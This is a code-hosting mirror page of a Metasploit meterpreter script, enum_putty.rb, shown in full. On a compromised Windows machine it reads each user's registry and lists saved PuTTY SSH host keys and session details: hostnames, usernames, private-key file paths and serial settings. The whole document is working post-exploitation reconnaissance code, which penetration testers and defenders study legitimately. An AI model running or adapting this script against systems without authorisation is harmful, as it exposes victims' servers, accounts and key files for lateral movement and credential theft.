Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

enum_putty.rb 3.4KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #
  7. # Meterpreter script for enumerating putty connections
  8. # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
  9. #
  10. @client = client
  11. #Options and Option Parsing
  12. opts = Rex::Parser::Arguments.new(
  13. "-h" => [ false, "Help menu." ]
  14. )
  15. opts.parse(args) { |opt, idx, val|
  16. case opt
  17. when "-h"
  18. print_line "Meterpreter Script for enumerating Putty Configuration."
  19. print_line(opts.usage)
  20. raise Rex::Script::Completed
  21. end
  22. }
  23. def hkcu_base
  24. key_base = []
  25. if not is_system?
  26. key_base << "HKCU"
  27. else
  28. key = "HKU\\"
  29. root_key, base_key = @client.sys.registry.splitkey(key)
  30. open_key = @client.sys.registry.open_key(root_key, base_key)
  31. keys = open_key.enum_key
  32. keys.each do |k|
  33. if k =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
  34. key_base << "HKU\\#{k}"
  35. end
  36. end
  37. end
  38. return key_base
  39. end
  40. def check_putty(reg_key_base)
  41. installed = false
  42. app_list = []
  43. app_list = registry_enumkeys("#{reg_key_base}\\Software")
  44. os = @client.sys.config.sysinfo['OS']
  45. if os =~ /(Windows 7|2008|Vista)/
  46. username_profile = registry_getvaldata("#{reg_key_base}\\Volatile Environment","USERNAME")
  47. elsif os =~ /(2000|NET|XP)/
  48. appdata_var = registry_getvaldata("#{reg_key_base}\\Volatile Environment","APPDATA")
  49. username_profile = appdata_var.scan(/^\w\:\D*\\(\D*)\\\D*$/)
  50. end
  51. if app_list.index("SimonTatham")
  52. print_status("Putty Installed for #{username_profile}")
  53. installed = true
  54. end
  55. return installed
  56. end
  57. def enum_known_ssh_hosts(reg_key_base)
  58. print_status("Saved SSH Server Public Keys:")
  59. registry_enumvals("#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\SshHostKeys").each do |host|
  60. print_status("\t#{host}")
  61. end
  62. end
  63. def enum_saved_sessions(reg_key_base)
  64. saved_sessions = []
  65. sessions_protocol = ""
  66. sessions_key = "#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\Sessions"
  67. saved_sessions = registry_enumkeys(sessions_key)
  68. if saved_sessions.length > 0
  69. saved_sessions.each do |saved_session|
  70. print_status("Session #{saved_session}:")
  71. sessions_protocol = registry_getvaldata(sessions_key+"\\"+saved_session,"Protocol")
  72. if sessions_protocol =~ /ssh/
  73. print_status("\tProtocol: SSH")
  74. print_status("\tHostname: #{registry_getvaldata(sessions_key+"\\"+saved_session,"HostName")}")
  75. print_status("\tUsername: #{registry_getvaldata(sessions_key+"\\"+saved_session,"UserName")}")
  76. print_status("\tPublic Key: #{registry_getvaldata(sessions_key+"\\"+saved_session,"PublicKeyFile")}")
  77. elsif sessions_protocol =~ /serial/
  78. print_status("\tProtocol: Serial")
  79. print_status("\tSerial Port: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialLine")}")
  80. print_status("\tSpeed: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialSpeed")}")
  81. print_status("\tData Bits: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialDataBits")}")
  82. print_status("\tFlow Control: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialFlowControl")}")
  83. end
  84. end
  85. end
  86. end
  87. if client.platform == 'windows'
  88. hkcu_base.each do |hkb|
  89. if check_putty(hkb)
  90. enum_known_ssh_hosts(hkb)
  91. enum_saved_sessions(hkb)
  92. end
  93. end
  94. else
  95. print_error("This version of Meterpreter is not supported with this Script!")
  96. raise Rex::Script::Completed
  97. end